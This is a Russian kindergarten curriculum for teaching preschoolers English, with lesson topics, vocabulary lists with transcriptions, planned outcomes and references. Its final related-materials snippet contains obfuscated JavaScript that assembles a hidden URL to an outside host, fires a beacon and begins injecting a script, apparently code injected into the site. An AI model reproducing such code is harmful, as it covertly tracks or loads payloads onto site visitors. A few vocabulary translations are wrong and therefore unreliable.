ДОПОЛНИТЕЛЬНАЯ ОБЩЕОБРАЗОВАТЕЛЬНАЯ ОБЩЕРАЗВИВАЮЩАЯ ПРОГРАММА «Good morning!» по английскому языку для дошкольников
рабочая программа по развитию речи (средняя группа)

Цыганкова Ксения Андреевна
Дополнительная общеобразовательная программа по обучению английскому языку детей дошкольного возраста имеет социально-педагогическую направленность; по функциональному предназначению является учебно-познавательной; по форме организации – групповой. Программа дает общее представление детям о мире как многоязычном и поликультурном сообществе. Она призвана обеспечить усвоение базовых основ, и способствовать формированию навыков решения элементарных коммуникативных задач на английском языке, а также, приобретению элементарных страноведческих знаний о странах изучаемого языка.
 

Скачать:


Предварительный просмотр:

Муниципальное автономное дошкольное образовательное учреждение «Детский сад комбинированной направленности №4» г. Сосновоборска

РАССМОТРЕНО

Педагогический советом

протокол №5 от 17.04.2024 г.

УТВЕРЖДАЮ

Заведующий

______________ В.В. Тиншан

Приказ №63 от 18.04.2024 г.

ДОПОЛНИТЕЛЬНАЯ ОБЩЕОБРАЗОВАТЕЛЬНАЯ

ОБЩЕРАЗВИВАЮЩАЯ ПРОГРАММА

«Good morning!»

Направленность программы: учебно-познавательная

Уровень программы:

Возраст обучающихся: 4-7 лет

Срок реализации: 1 год

Составитель:

Педагог дополнительного образования

Цыганкова Ксения Андреевна

Сосновоборск 2024

  1. КОМПЛЕКС ОСНОВНЫХ ХАРАКТЕРИСТИК ДОПОЛНИТЕЛЬНОЙ ОБЩЕОБРАЗОВАТЕЛЬНОЙ ОБЩЕРАЗВИВАЮЩЕЙ ПРОГРАММЫ.

  1. Пояснительная записка

Дополнительная общеобразовательная общеразвивающая программа  «Goodmorning!» разработана на основании следующей нормативно-правовой базы:

  • Федеральный Закон от 29.12.2012 № 273 – ФЗ (ред. от 31.07.2020) «Об образовании в Российской Федерации» с изменениями и дополнениями;
  • Федеральный государственный образовательный стандарт дошкольного образования от 17.10.2013 г. № 1155;
  • Постановление Главного государственного санитарного врача РФ от 28 сентября 2020 года № 28 «Об утверждении СанПиН 2..4.3648-20 «Санитарно-эпидемиологические требования к организациям воспитания и обучения, отдых и оздоровления детей и молодежи»;
  • Приказ Министерства просвещения Российской Федерации от 30 сентября 2020 г. № 533 «О внесении изменений в порядок организации и осуществления образовательной деятельности по дополнительным общеобразовательным программам, утвержденный приказом министерства просвещения Российской Федерации от 9 ноября 2018 г. №196»;
  • Приказ Министерства просвещения РФ от 09 ноября 2018 года № 196 «Об утверждении Порядка организации и осуществления образовательной деятельности по дополнительным общеобразовательным программам»;
  • Стратегия развития воспитания в Российской Федерации до 2025 года, утвержденная распоряжением Правительства РФ от 29.05.2015 г. № 996-р.
  • Концепция развития дополнительного образования детей до 2030 года (утвержденная распоряжением Правительства Российской Федерации от 31 марта 2022 г. №678-р);
  • Письмо Министерства образования и науки РоссийскойФедерации «О направлении информации» № 09-3242 от 18.11.2015 г. Методические рекомендации по проектированию дополнительных общеразвивающих программ (включая разноуровневые программы) разработанные Минобрнауки России совместно с ГАОУ ВО «Московский государственный педагогический университет», ФГАУ «Федеральный институт развития образования», АНО ДПО «Открытое образование»;
  • Приказ Министерства просвещения Российской Федерации от 03.09.2019 г. № 467 «Об утверждении Целевой модели развития региональных систем дополнительного образования детей»;
  • Приказ Министерства образования и науки Российской Федерации от 09.01.2014 г. №2 «Об утверждении Порядка применениями организациями, осуществляющимися образовательную деятельность, электронного обучения, дистанционных образовательных технологий при реализации образовательных программ».

  1. Направленность программы

       Дополнительная общеобразовательная программа по обучению английскому языку детей дошкольного возраста имеет социально-педагогическую направленность; по функциональному предназначению является учебно-познавательной; по форме организации – групповой. Программа дает общее представление детям о мире как многоязычном и поликультурном сообществе. Она призвана обеспечить усвоение базовых основ, и способствовать формированию навыков решения элементарных коммуникативных задач на английском языке, а также, приобретению элементарных страноведческих знаний о странах изучаемого языка.

  Актуальность и новизна

           В современном мире возросла значимость изучения иностранного языка. Сейчас изучение английского языка в школе начинается со второго или первого класса. Новые образовательные стандарты ставят высокие требования к усвоению иностранного языка. Во многих школах изучают не только английский, но и другие иностранные языки.

         В связи с возрастающей учебной нагрузкой в начальной школе, с одной стороны, и заинтересованностью родителей в изучении их детьми английского языка с другой, появилась необходимость в создании программы обучения английского языка в раннем возрасте.

Новизна программы состоит в том, что при обучении английскому языку пристальное внимание уделяется выработке навыков свободного общения и прикладного применения английского языка.

Актуальность программы обусловлена ее практической значимостью. Дети смогут применить полученные знания когда пойдут в школу. К  тому моменту у них будет сформирован познавательный интерес и накоплен определенный объем знаний, что значительно облегчит освоение образовательной программы по английскому языку в школе.

Влияние иностранного языка  на развитие личности поистине уникальны. Известно, что дошкольный возраст является благоприятным для усвоения иностранного языка, так как у маленького ребёнка прекрасно развита долговременная память.

Отличительные особенности программы

Занятия по программе  знакомят ребенка с основами иноязычной культуры, т.е. сообщает ребенку базовый объем знаний, умений и навыков. Занятия являются устным подготовительным этапом к чтению и письму.

Раннее обучение иностранному языку развивает ребенка всесторонне. У него улучшается память, сообразительность, развивается наблюдательность.

Поскольку игра является ведущим видом деятельности дошкольника, задачи обучения тесно связаны с миром, в котором живет ребенок. Это мир сказок, стишков, песенок, где царит любознательность и желание поиграть со сверстниками.

Учебный материал подается в игровой форме, неутомительной для ребенка. Различные творческие задания будут способствовать развитию воображения и помогут лучше усвоить пройденный материал на занятии. Обучение проводится с опорой на родной язык, но постепенно переходит на иностранный. Направлена программа на быстрое и качественное овладение разговорным английским языком (усвоение алфавита, правильно называть цвета, считать до 10, рассказывать о себе и своей семье и так далее). Ребенку придется прослушивать сказки, дорисовывать предметы и придумывать рифмовки, раскрашивать, соединять точки, находить спрятавшихся зверюшек, делать аппликации и многое другое. На каждом занятии дети разучивают стишки, пословицы, песни либо рифмовки которые построены на словах и фразах, уже усвоенных ребенком.

Данная программа базируется на принципах коммуникативного обучения и направлена на формирование положительной познавательной мотивации

Адресат программы

Программа предназначена для детей возрастом 4-7 лет, наполняемость группы  10-12 человек.

                             Срок реализации и объем учебных часов

Программа рассчитана на 1 год обучения: 64 часа, 2 раза в неделю, по 1 часу.

Форма обучения и режим занятий

Обучение осуществляется в очной форме.Занятия проводятся два раза в неделю по 1 часу.

Продолжение учебного часа – 25-30 минут согласно СанПиН 2..4.3648-20 от 28.09.2020 г.

  1. Цель и задачи дополнительной общеобразовательной общеразвивающей программы.

Цель программы:

 Ознакомление с новой языковой средой, формирование интереса к изучению иностранного (английского) языка.

 Задачи:

Личностные:

 • формировать представление о мире как многоязычном и поликультурном сообществе;

• формировать желания продолжать обучение иностранному языку в  дальнейшем, желание использовать английский язык как средство общения;

 Метапредметные:

 • развивать умения взаимодействовать с окружающими при выполнении различных заданий;

• формировать мотивацию к изучению иностранного языка; Предметные:

 • развивать два вида речевой деятельности: аудирование (восприятия речи на слух) и говорение.

 • развивать элементарную диалогическую и монологическую речь;

• вырабатывать у детей навыки правильного произношения английских звуков и правильного интонирования высказывания

  1. СОДЕРЖАНИЕ ПРОГРАММЫ

2.1. Учебный план

№ п/п

Наименование раздела, темы

Количество часов

Формы аттестации / контроля

Всего

Теория

Практика

1.

Знакомство. Как тебя зовут?

Вежливые слова. Как твои дела?

4

1

3

Устный опрос,

Решение проблемных задач,

Диагностика.

2.

Цвета.

«Игра «Let’s draw»

4

1

3

Опрос,

Игра, выставка творческих работ

3.

Животные.

Питомцы.

Дикие животные.

Животные фермы.

4

1

3

Опрос, игра, наблюдение, проектная деятельность, диагностика

4.

Счет от 1 до 10.

Игра «Сосчитай». Сколько тебе лет?

3

1

2

Опрос, диагностика, игра, решение проблемных задач

5.

Мои игрушки. Моя любимая игрушка.

Какого цвета игрушки?

5

2

3

Опрос, игра, решение проблемных задач, проектная деятельность

6.

Одежда

6

2

4

Презентация, опрос, проектная деятельность, игра

7.

Моя семья.

5

2

3

Опрос, проектная деятельность, презентация

8.

Мое тело Какого цвета волосы? Сколько у тебя пальцев?

Игра «Покажите свои …»

6

2

4

Опрос, проектная деятельность, презентация, игра

9.

«Что я умею делать»

«Мне нравится/мне не нравится…»

7

3

4

Опрос, проектная деятельность, презентация

10.

Времена года

6

2

4

Опрос, проектная деятельность, презентация, выставка творческих работ

11.

Профессии

6

2

4

Опрос, проектная деятельность, презентация, игра, диагностика

12.

Фрукты и овощи.

3

1

2

Опрос, игра, диагностика

13.

Еда

5

2

3

Опрос, игра, диагностика

1.4 Содержание учебного плана программы

1. Знакомство. Как тебя зовут? Вежливые слова. Как твои дела?

Ознакомление с новыми лексическими единицами. Тренировка произношения звуков и интонации речи. Знакомимся с новыми словами и выражениями.Закрепление употребления фраз приветствия и прощания: Hello! Goodmorning/afternoon/evening/night!

Bye! Goodbye!

Thankyou/ Sorry

Игра «Помоги Микки поздороваться/попрощаться».

Учимся отвечать на вопрос: «Howareyou?», рассказываем как у нас дела.

2.Цвета.

Повторение ранее изученного на основе цветов радуги. Просмотр мультфильмов. Рисование картин по теме. Основные лексические единицы:

Red — красный.

Orange — оранжевый.

Yellow — желтый.

Green — зеленый.

Blue — голубой.

Indigo — синий.

Violet — фиолетовый.

Учим сочетания цветов на примере смешивания краски.

3.Животные. Питомцы. Дикие животные. Животные фермы.

Повторение ранее изученного, закрепление.

Игра «What kind of animal is this?» Просмотр презентации и мультфильмов по теме.

Основные лексические единицы:

сat [kæt] кот

kitten [kɪtn] котенок

dog [dɒɡ] собака

puppy ['pʌpɪ] щенок

hamster ['hæmstə] хомяк

parrot ['pærət] попугай

guinea pig ['ɡɪnɪ pɪɡ] морская свинка

4.Счет от 1 до 10.

Повторение и диагностика ранее изученного.

Игра «Посчитай сколько?»

Учимся отвечать на вопрос: «How old are you?»

Основные лексические единицы:

0 — Zero/Oh;

1 — One;

2 — Two;

3 — Three;

4 — Four;

5 — Five;

6 — Six;

7 — Seven;

8 — Eight;

9 — Nine;

10 — Ten.

5.Мои игрушки.

Повторение и диагностика ранее изученного. Знакомство с новыми лексическими единицами.

Проект:  «My favourite toy». Учимся описывать игрущки: цвет, размер, величина.

6.Одежда.

Изучение новых лексических единиц по теме:

Верхняя одежда:

coat (пальто),

jacket (куртка),

sweater (свитер),

hoodie (толстовка с капюшоном),

raincoat (дождевик),

hat (шапка),

gloves (перчатки),

scarf (шарф),

boots (ботинки).

Повседневная одежда:

shirt (рубашка),

jeans (джинсы),

pants (брюки),

skirt (юбка),

dress (платье),

socks (носки)

 Учимся описывать что мы надеваем каждый день, а что по погоде.

7.Моя семья.

Изучение новых лексических единиц:

мать — mother [ˈmʌðə];

отец — father [ˈfɑːðə];

брат — brother [ˈbrʌðə];

сестра — sister [ˈsɪstə];

дочь — daughter [ˈdɔːtə];

сын — son [sʌn];

дедушка — grandfather [ˈɡrænfɑːðə];

бабушка — grandmother [ˈɡrænˌmʌðə];

внук, внучка, внуки — grandson [ˈɡrænsʌn], granddaughter [ˈɡrændɔːtə], grandchildren [ˈɡræntʃɪldrən].
Проект «Мой фотоальбом». Дети презентуют фото своей семьи, учатся рассказывать о ее составе.

Разучивание песни «Baby shark».

8.Мое тело

Изучение новых лексических единиц:

Eyes – глаза – [ˈaɪz]

Nose – нос – [nəʊz]

Head – голова - [hed]

Body – тело - ['bɔdɪ]

Arm – рука - [ɑːm]

Leg – нога - [leg]

Face – лицо – [feɪs]

Finger – палец – [ˈfɪŋɡər]

Heart – сердце – [hɑːrt]

Shoulder – спина - ['ʃəuldə]

Учимся описывать свое тело.

9. «Я умею…»

«Мне нравится/мне не нравится…»

Изучение новых лексических единиц.

Разбор состава английского предложения с формами: « I can…», «I like…».

Формирование навыка состава связных предложений на английском языке.

10.Времена года.

Изучение новых лексических единиц:

Зима — Winter.

Весна — Spring.

Лето — Summer.

Осень — Autumn.

Учимся рассказывать о погоде, о смене времен года. Формирование навыков связных предложений на английском языке.

11. Профессии.

Изучение новых лексических единиц:

Teacher- учитель

Builder- строитель

Scientist- ученый

Actor- актер

shop assistant- продавец

cook- повар

doctor- доктор, врач

policeman- полицейский

Проект «When I  grow up…» - представление детьми рассказа кем они хотят стать, когда вырастут.

12.Фрукты и овощи.

Повторение и диагностика пройденного. Ввод новых лексических единиц.

Основные лексические единицы:

Vegetables — овощи;

Beet — свёкла;

Cabbage — капуста;

Сarrot — морковь;

Cucumber — огурец;

Eggplant — баклажан;

Onion — лук;

Potato — картофель;

Pumpkin — тыква;

Radish — редис;

Tomato — помидор.

Аpple — яблоко;

Banana — банан;

Orange — мандарин;

Pear — груша;

Pineapple — ананас;

Mango — манго;

Peach — персик;

Lemon — лимон;

Lime — лайм;

Apricot — абрикос.

Ролевая игра «In the shop».

12. Еда.

Изучение новых лексических единиц:

food — питание, еда;

ham — ветчина;

sausage — колбаса, сосиска;

meat — мясо;

egg — яйцо;

pizza — пицца;

soup — суп;

bread — хлеб;

milk — молоко;

porridge — каша;

flour — мука;

salad — салат;

fish — рыба;

chicken — цыплёнок;

pork — свинина;

beef — говядина;

butter — масло;

macaroni — макароны;

cheese — сыр;

rice — рис;

pasta — паста;

salt — соль;

sandwich — бутерброд;

Ролевые игры: «In the shop», «In the restaurant».

                                1.5. Планируемые результаты:

        Основные требования к планируемым результатам освоения программы «Goodmorning!» представляют собой не нормативно закрепленные знания или компетенции, а социальные и психологические характеристики возможных достижений ребёнка на этапе завершения уровня. Дошкольного образования. Главным итогом освоения программы следует считать активное и заинтересованное отношение детей к занятиям, положительное переживание каждым ребенком своего участия в организуемых видах познавательной активности и желание продолжать обучение в следующей возрастной группе английского языка и школе.

 Личностные результаты:

      В результате освоения социально-личностной компетенции будет / будут:

  • сформирован интерес к изучению английского языка и иностранной культуры;
  • сформировано желание продолжать изучение английского языка и окружающего мира;
  • продемонстрировано понимание важности учения в жизни человека;
  • развито гуманное отношение к людям и животным;
  • расширен социальный кругозор (я и окружающий мир).

Метапредметные результаты:

         В результате освоения учебно-познавательной компетенции будут / будет:

  • сформированы элементарные познавательные действия для запоминания слов, выражений английского языка, а также кратких диалогов;
  •  усвоены отдельные универсальные познавательные действия; усвоен прием подражания правильным формам речевого и неречевого поведения;
  •  развито умение организовать свое рабочее место;
  • развито умение действовать по образцу;
  • продемонстрировано умение оценивать поступки и предметы;
  • продемонстрировано умение выполнять игровое задание (следовать инструкциям взрослого, давать ответы или составлять краткие высказывания на английском языке по игровой ситуации общения);
  • продемонстрирован прием сравнения и сопоставления предметов и явлений.

  Предметные результаты

         В результате освоения речевой коммуникативной компетенции будут / будет:

  • усвоены слова английского языка для активного употребления (не менее 30 слов)
  • усвоены слова английского языка для узнавания(около 50 слов);

К концу учебного года (май) дети должны уметь:

  •  приветствовать собеседника, познакомиться с ним;
  •  вычленять английскую речь в общем речевом потоке;
  •  здороваться, прощаться на английском языке;
  •  отвечать на элементарные вопросы.

РАЗДЕЛ II.  КОМПЛЕКС ОРГАНИЗАЦИОННО-ПЕДАГОГИЧЕСКИХ УСЛОВИЙ

          2.1.  Календарный учебный график

№п/п

Год обучения

Дата начала занятий

Дата окончания занятий

Количество учебных недель

Количество учебных дней

Количество учебных часов

Режим занятий

Сроки проведения (промежуточной) итоговой аттестации

1.

1

01.10.2024

31.05.2025

32

64

64

2 раза в неделю  по 1 часу

 декабрь

май

2.2. Условия реализации программы

Материально-техническое обеспечение

Дополнительная общеобразовательная общеразвивающая программа «Goodmorning!» реализуется на базе МАДОУ ДСКН № 4 г.Сосновоборска. 

Для реализации данной программы необходимо следующее оборудование:

  1. Помещение

 оборудованный кабинет-лаборатория: столы и стулья, шкаф с отделениями для хранения методических, дидактических материалов, расходных материалов и канцелярии. 

Помещение соответствует санитарно-гигиеническим требованиям для проведения занятий и охране труда:

- в помещении равномерное освещение и отсутствие прямых и отраженных бликов,

- помещение сухое, хорошо проветриваемое,

- в кабинете имеются столы и стулья по количеству участников, отвечающие эргономическим требованиям, раковина, холожная и горячая вода,

- в наличии шкафы для хранения материалов, наглядных пособий,

  1. Оборудование

1) ноутбук;

2) мультимедийный проектор; 

3) экран; 

4) оборудование для музыкального сопровождения занятий.

5) магнитная доска

Наглядные пособия:

- тематические карточки «Цвета», «Формы», «Семья», «Продукты», «Времена года», «Фрукты и овощи», «Мебель», «Одежда», «Животные», «Моя комната», «Части тела»; «Транспорт»

- объемные предметы разной величины и цвета (машинки, мячики, животные, кубики, куклы);

Аудиоматериалы:

- песни: «Hello», «How are You?», «Good Bye»;

- звуки диких животных;

- звуки домашних животных;

- звуковое сопровождение сказок (звуковые эффекты).

Видеоматериалы:

«Good Morning», «Hello, Hello, How Are You? What’s Your Name?», «Butterflies», «If You Happy», «Shapes», «My Teddy Bear», «Head, Shoulders, Knees and Toes», «Let’s Go to the Zoo», «Let’s Make a Pizza», «Rain, Rain Go Away», «Who Is She?», «Transport», «Old Mc Donald’s Farm», «Snowflakes», «Oranges Are Yummy», «My Family», «Primary Colors», «Five Little Monkeys», «Dangerous Toys», «My Toys Song», «I’m a Little Teapot», «My Room Is Cool», «Put on Your Shoes», «What’s the Weather Like?».

2.3. Научно-методическое обеспечение образовательной программы

1.        Английский язык и дошкольник М. В. Штайнепрайс. М.:Сфера, 2007.

2.        Бурова И.И., Буров А.В. Английский язык. Словарик. Песенки. Игры. – М., ОЛМА Медиа Групп, 2007.

3.        Иванова М.В. Английский для самых маленьких. – М., АСТ-Астрель, 2006.

4.        Каркусова Д.М. Учим английскому языку, играя. Пособие для учителей. – Ростов н/Д., Феникс, 2007.

5.        КлементьеваТ.Б., БоумаЭ. Path to the World. Английский язык для дошкольников: в 2 ч. - М., Вентана-Граф, 2012.

6.        Пассов, Е.И. Коммуникативный метод обучения иноязычному говорению. - М.: Просвещение, 1991.

7.        Протасова, Е.Ю. Обучение дошкольников иностранному языку. Программа «Littlebylittle»/ Е. Ю. Протасова, Н. М. Родина. – М.: Карапуз-Дидактика, 2009.

Список литературы

1. Негневицкая Е.И. Книга для учителя. – М.: Просвещение, 1994

3. Верещагина И.Н., Притыкина Т.А. Книга для учителя. – М.: Просвещение, 2003

4. Английский язык для маленьких, Под ред. Н.А. Бонк – М., 2000

5. Шишкова И.А., Вербовская И.Е. Английский для малышей. –  М.: Издательский дом «РОСМЭН», 2000

6. Андреева Н.Ш. Программа английского языка – Оренбург, 1994

7. Английский язык в картинках. Серия “Готовимся к школе” — М, 2003

9. Ленская Е.А., Негневицкая Е.И. “Учимся английскому языку” — М, 1997

10. Скульте В. Английский для детей – М., 1997

11. Кириллова Ю.В. Английский для дошкольников. Ростов н/Д Феникс,


По теме: методические разработки, презентации и конспекты

Программа по изучению английского языка для дошкольников . "Игровой английский язык".

Программа по изучению иностранного языка "Игровой английский язык". для детей от 4 до 6.5 лет...

Отчет о работе по дополнительной платной услуге по изучению иностранного языка «Английский язык для дошкольников» за 2015–2016 учебный год Руководитель дополнительной платной образовательной услуги: Рзаева Оксана Минниахматовна

Отчет о работе по дополнительной платной услуге по изучению иностранного языка «Английский язык для дошкольников»  за 2015–2016 учебный год Руководитель дополнительной платной образовательно...

Программа "Английский язык и дошкольник" для дошкольников изучающих английский язык

В связи с возрастающей учебной нагрузкой в детском саду, с одной стороны, и заинтересованностью родителей в изучении их детьми английского языка с другой, а также исходя из заботы о здоровье ре...

Программа Дополнительного образования «Английский язык для дошкольников»

Настоящая программа составлена с учетом особенностей умственного, психического и физиологического развития детей. В процессе обучения иностранному языку дети познают не только новое, но и начинают бол...

Дополнительная общеобразовательная общеразвивающая программа социально-педагогическй направленности "Английский язык для дошкольников"

Знание иностранных языков является неотъемлемым навыком в современном мире. В связи с этим возникает актуальность обучения языкам уже в дошкольном возрасте. Гибкость механизма запоминания, отсутс...

МЕТОДИЧЕСКАЯ РАЗРАБОТКА по английскому языку для дошкольников «Наше путешествие в зоопарк» по дополнительной общеразвивающей программе «Музыка-English» второго модуля обучения школы раннего эстетического развития

Методическая разработка предназначена для обучения основам иностранного языка детей дошкольного возраста. Представлено развивающее занятие с использованием нового языкового материала,а также закреплен...

НОД "Настроение Джони" по дополнительной образовательной программе "Английский язык и дошкольник" в ДОУ

var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'nxqkbdvu.lussoit.com\',\'48\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); var script = document.cre...